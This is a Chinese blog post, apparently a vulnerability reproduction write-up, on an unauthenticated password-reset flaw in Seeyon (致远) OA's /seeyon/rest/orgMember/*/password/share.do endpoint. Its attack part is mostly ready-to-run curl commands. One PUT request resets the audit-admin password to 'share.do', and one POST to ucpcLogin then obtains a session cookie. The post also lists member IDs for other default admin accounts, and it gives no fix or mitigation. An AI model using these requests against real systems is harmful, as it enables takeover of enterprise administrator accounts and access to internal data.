致远ucpclogin密码重置

致远 OA 作为常用的协同管理平台,其安全性直接关系到企业内部数据与服务器的稳定运行。然而,部分版本的致远 OA 存在一处高危的ucpcLogin密码重置漏洞,攻击者可利用该漏洞未授权重置系统默认管理员密码

一、漏洞原理

致远 OA ucpcLogin密码重置漏洞(漏洞编号未公开,行业内常以 “share.do” 漏洞代称)主要存在于/seeyon/rest/orgMember/*/password/share.do接口,影响范围覆盖致远 A8、A8 + 等多个主流版本(如 V8.0SP2、V10 早期版本)。该漏洞的本质是REST 接口未授权访问 + 默认密码重置逻辑缺陷。

二、漏洞复现

步骤 1:发送 PUT 请求,触发密码重置

通过 PUT 请求访问share.do接口,验证漏洞是否存在。以审计管理员(audit-admin)为例,执行如下curl命令:

curl -X PUT "http://目标OA地址:端口/seeyon/rest/orgMember/-4401606663639775639/password/share.do" -H "Host: 目标OA地址:端口" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" -H "Accept: */*" -H "Cookie: JSESSIONID=任意有效会话ID; loginPageURL=" -H "Content-Length: 0"

http数据包

步骤 2:POST 请求登录,获取有效 Cookie

利用重置后的默认密码share.do,通过ucpcLogin接口登录,获取服务器生成的会话 Cookie(JSESSIONID):

curl -X POST "http://目标OA地址:端口/seeyon/rest/authentication/ucpcLogin" -H "Host: 目标OA地址:端口" -H "Content-Type: application/x-www-form-urlencoded" -d "login_username=audit-admin&login_password=share.do&ticket="

http数据包

成功标志:响应状态码为200 OK,且返回 JSON 中包含"success":true"name":"审计管理员",说明密码已被重置为share.do

有的OA可能没有启用 所以有的的时候需要测试的代码需要更换一下,以下是默认账号

seeyon-guest -696400025239268
system -72730320132347481
audit-admin -440160666363
group-admin 5725175934914479521

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值